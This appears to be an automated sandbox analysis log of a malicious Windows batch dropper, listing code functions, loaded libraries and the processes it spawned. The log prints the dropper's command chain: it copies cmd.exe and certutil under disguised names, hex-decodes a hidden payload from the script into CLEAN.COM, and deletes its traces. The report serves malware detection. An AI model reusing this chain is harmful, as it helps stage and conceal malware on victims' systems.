Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB176EE410_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB17372C10_2_00007FF6EB17372C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB197F0010_2_00007FF6EB197F00
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1A153810_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB19D9D010_2_00007FF6EB19D9D0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1781D410_2_00007FF6EB1781D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB18422410_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB17222010_2_00007FF6EB172220
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB19AA3010_2_00007FF6EB19AA30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB174A3010_2_00007FF6EB174A30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB17CE1010_2_00007FF6EB17CE10
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18785411_2_00007FF6EB187854
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1837D811_2_00007FF6EB1837D8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17341011_2_00007FF6EB173410
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17AA5411_2_00007FF6EB17AA54
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18555411_2_00007FF6EB185554
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB178DF811_2_00007FF6EB178DF8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB172C4811_2_00007FF6EB172C48
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19AC4C11_2_00007FF6EB19AC4C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17188411_2_00007FF6EB171884
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17B0D811_2_00007FF6EB17B0D8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1818D411_2_00007FF6EB1818D4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB177D3011_2_00007FF6EB177D30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17851011_2_00007FF6EB178510
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB175B7011_2_00007FF6EB175B70
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB179B5011_2_00007FF6EB179B50
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB173F9011_2_00007FF6EB173F90
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB176BE011_2_00007FF6EB176BE0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19AFBC11_2_00007FF6EB19AFBC
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB180A6C11_2_00007FF6EB180A6C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17524011_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17765011_2_00007FF6EB177650
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17D25011_2_00007FF6EB17D250
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB179E5011_2_00007FF6EB179E50
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17E68011_2_00007FF6EB17E680
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19EE8811_2_00007FF6EB19EE88
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB176EE411_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17372C11_2_00007FF6EB17372C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB197F0011_2_00007FF6EB197F00
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1A153811_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19D9D011_2_00007FF6EB19D9D0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1781D411_2_00007FF6EB1781D4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18422411_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17222011_2_00007FF6EB172220
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19AA3011_2_00007FF6EB19AA30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB174A3011_2_00007FF6EB174A30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB17CE1011_2_00007FF6EB17CE10
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6EB18498C appears 40 times
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6EB18081C appears 36 times
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6EB183448 appears 72 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD89F11C appears 37 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD89F1B8 appears 183 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD857BAC appears 34 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD82EB98 appears 93 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD8A64A6 appears 173 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD857D70 appears 35 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD79D1C8 appears 41 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD850D10 appears 181 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD7CBC9C appears 280 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7FD84ABFC appears 818 times
Source: classification engineClassification label: mal72.bank.evad.winCMD@20/10@0/0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF6EB1732B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD87826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF7FD87826C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB19FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF6EB19FB54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D7EC0 CoCreateInstance,#357,#207,LocalFree,LocalFree,7_2_00007FF7FD7D7EC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8A3148 FindResourceExW,LoadResource,7_2_00007FF7FD8A3148
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Xirnkxhvuzwepe.cmdReversingLabs: Detection: 29%
Source: Xirnkxhvuzwepe.cmdVirustotal: Detection: 12%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
Source: Xirnkxhvuzwepe.cmdStatic file information: File size 3228698 > 1048576
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1994913771.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1998130841.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2005107794.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2007392598.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.2008335788.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.2007679556.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.2008750907.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.2010642748.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: alpha.exe.3.drStatic PE information: section name: .didat
Source: kn.exe.5.drStatic PE information: section name: .didat
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C3668 push rsp; ret 7_2_00007FF7FD7C3669
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\alpha.exeAPI coverage: 7.9 %
Source: C:\Users\Public\alpha.exeAPI coverage: 8.4 %
Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
Source: C:\Users\Public\alpha.exeAPI coverage: 9.7 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6EB1735B8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6EB1735B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF7FD815E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF7FD871B04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8719F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF7FD8719F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF7FD81DBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF7FD853674
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF7FD81D4A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7DD440
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF7FD81B3D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF7FD8710C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF7FD873100
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF7FD876F80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD80C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF7FD80C6F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD87234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF7FD87234C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF6EB1735B8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF6EB1735B8
